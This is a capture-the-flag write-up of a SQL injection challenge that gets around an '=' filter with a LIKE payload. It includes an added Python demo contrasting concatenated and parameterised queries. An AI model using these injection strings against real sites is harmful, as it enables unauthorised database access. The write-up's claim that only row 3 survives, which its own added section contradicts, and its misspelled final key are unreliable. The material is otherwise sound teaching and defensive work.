
# \[SuNiNaTaS] Game 06

Challenge source: <http://suninatas.com/challenge/web06/web06.asp>

***

<figure><img src="https://blog.kakaocdn.net/dna/di2jWA/dJMcafyegLG/AAAAAAAAAAAAAAAAAAAAAFWCiqwSZ4rUqTP-OV6TT0vc9Br4kVJ8kPb92ke_GpzP/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=lFdxvBobE5eL%2BjUubRp8oc9LQwA%3D" alt="" height="600" width="1482"><figcaption></figcaption></figure>

On first access a bulletin board appears. Start with the hint.

<figure><img src="https://blog.kakaocdn.net/dna/dYZm7b/dJMcabJmNxf/AAAAAAAAAAAAAAAAAAAAAAOUxWC5FUZJBgSggDXwOj9qVFTm5zOR_-LYYn6ZNeO3/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=7u8JlFHf1%2BYCukI5ulFfIvZuEeo%3D" alt="" height="677" width="1120"><figcaption></figcaption></figure>

It tells us to read the post written by suninatas. Press \[Back] to return to the board.

<figure><img src="https://blog.kakaocdn.net/dna/cJvJWc/dJMcaaDGz0u/AAAAAAAAAAAAAAAAAAAAAGKI6Y8S6DcJS7O3QL_9_RlWdDWotnCdsnOoMIgNyWxZ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=ei5rjztxL0Ouq%2BxQ9a%2FU1OezcnQ%3D" alt="" height="396" width="1052"><figcaption></figcaption></figure>

Click the README written by suninatas.

<figure><img src="https://blog.kakaocdn.net/dna/dUfZ7j/dJMcabWTK0p/AAAAAAAAAAAAAAAAAAAAAP1eHgSWGtbMkju8snHVxykMDgRW2dmcvxv7TOU8jEIV/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=4ifJlPpoMGznz9poLLJqPAFxW5k%3D" alt="" height="287" width="348"><figcaption></figcaption></figure>

A popup appears that is obviously a SQL injection. The SQL statement selects only the `szPwd` column from a table named `T_Web13`. The row to be returned must have index 3 and a `szPwd` equal to `'"&pwd&"'`.\
Whatever you type into the Password prompt is spliced into `"&pwd&"`.\
For example, if you enter `' or 1=1` in the prompt,

```
"select szPwd from T_Web13 where nIdx = '3' and szPwd = ' or 1=1'"
```

the query is built as shown above.\
As you will notice when you try it, `=` is also being filtered.

<figure><img src="https://blog.kakaocdn.net/dna/bDqkFv/dJMcahbJ951/AAAAAAAAAAAAAAAAAAAAACvxWmmkklZhnhyz5_O6DkfK7QBcuYbCtcQTStVDbICg/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6eceI%2FJQHKbUcgZYAfn09%2FFSQdM%3D" alt="" height="286" width="356"><figcaption></figcaption></figure>

To get around this, use `like` instead of `=`.\
If you enter `' or 1 like 1 -- -` in the prompt,

```
select szPwd from T_Web13
where nIdx = '3' and szPwd = ' or 1 like 1 -- -'
-- effective predicate after the trailing comment is stripped:
-- (nIdx = '3' AND szPwd = '') OR 1 LIKE 1
```

the query runs as shown above.\
The trailing `-- -` comment (in SQL, `--` must be followed by a space to be recognised as a comment; `--+` works as well) nullifies the `and` comparison on the password, leaving only the index condition.\
So only the row with index 3 is left in the table.
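The following is an added example (not part of the original write-up, and not the challenge's own ASP code) that reproduces the two query patterns from the previous sections against a constructed in-memory SQLite table: the vulnerable string-concatenated query with the `"&pwd&"` splice, a blacklist that rejects `=` the way the challenge appears to, and a parameterised query as the fix. The table rows, the `blacklist_filter` function and the assumption that the filter is a plain substring check are all constructed for this example. It also shows a caveat worth knowing as a defender: because `AND` binds tighter than `OR`, the injected predicate `(nIdx = '3' AND szPwd = '') OR 1 LIKE 1` is true for every row, so the concatenated query returns the whole column, not just index 3.

```python
import sqlite3

# Constructed sample data mimicking the challenge's T_Web13 table (assumption).
ROWS = [(1, "alpha"), (2, "bravo"), (3, "charlie")]


def make_db():
    """Build a throwaway in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_Web13 (nIdx INTEGER, szPwd TEXT)")
    conn.executemany("INSERT INTO T_Web13 VALUES (?, ?)", ROWS)
    return conn


def blacklist_filter(pwd):
    """Assumed model of the challenge's '=' filter: reject any input containing '='.
    A substring blacklist like this is bypassed by equivalent operators such as LIKE."""
    return "=" not in pwd


def query_concatenated(conn, pwd):
    """Vulnerable pattern from the write-up: user input spliced into the SQL string."""
    sql = "select szPwd from T_Web13 where nIdx = '3' and szPwd = '" + pwd + "'"
    return [row[0] for row in conn.execute(sql)]


def query_parameterized(conn, pwd):
    """Hardened form: the input is bound as a value, so it can never change the query shape."""
    sql = "select szPwd from T_Web13 where nIdx = ? and szPwd = ?"
    return [row[0] for row in conn.execute(sql, (3, pwd))]


def demo(pwd):
    """Run one prompt input through the filter and both query styles.

    Returns a dict with whether the input passed the blacklist, the rows the
    concatenated query returns (None if the filter rejected the input), and the
    rows the parameterised query returns.
    """
    conn = make_db()
    passes = blacklist_filter(pwd)
    concatenated = query_concatenated(conn, pwd) if passes else None
    parameterized = query_parameterized(conn, pwd)
    conn.close()
    return {
        "passes_filter": passes,
        "concatenated": concatenated,
        "parameterized": parameterized,
    }


if __name__ == "__main__":
    for candidate in ["charlie", "' or 1=1", "' or 1 like 1 -- -"]:
        print(repr(candidate), "->", demo(candidate))
```

Running the block shows the legitimate password returning one row under both styles, the `' or 1=1` input being stopped only by the blacklist, and the `' or 1 like 1 -- -` input passing the blacklist and dumping every `szPwd` value from the concatenated query while the parameterised query returns nothing. The lesson for the defender is that the fix is binding parameters (or, in classic ASP, `ADODB.Command` with parameters), not a longer blacklist.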

<figure><img src="https://blog.kakaocdn.net/dna/bngPdN/dJMcaiuUiBJ/AAAAAAAAAAAAAAAAAAAAAKCyomZzrv_jIb_v5aX5e52ihgTo_ojQzNdxt8k6YgAa/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=QYvJHHgbd7doNrNO8Zou%2FSHn2Y4%3D" alt="" height="310" width="600"><figcaption></figcaption></figure>

For the record, that auth\_key is not the answer (lol;;;;;;;;;)

<figure><img src="https://blog.kakaocdn.net/dna/ETJbD/dJMcahW7lTr/AAAAAAAAAAAAAAAAAAAAANIZnE1dtXdc8-Y_0lJI1_Z8aZAg667fcV6tN6Bp2nlW/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=gY3Z12ennd8j7Cp8osGgKRXmzUk%3D" alt="" height="642" width="1021"><figcaption></figcaption></figure>

Since nothing is visible on the screen, press \[F12].

<figure><img src="https://blog.kakaocdn.net/dna/cvsDZf/dJMcacaq0kl/AAAAAAAAAAAAAAAAAAAAAPOxJ0G0PhTa3EMBVKY924EXzQqCZYJu_ruwFQ5qegF7/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=uC4GCFKaT8gxALeY5oi1D7Z4OJc%3D" alt="" height="291" width="618"><figcaption></figcaption></figure>

The first emperor of Rome was Augustus Caesar.\
Therefore the Authkey is Augutus.
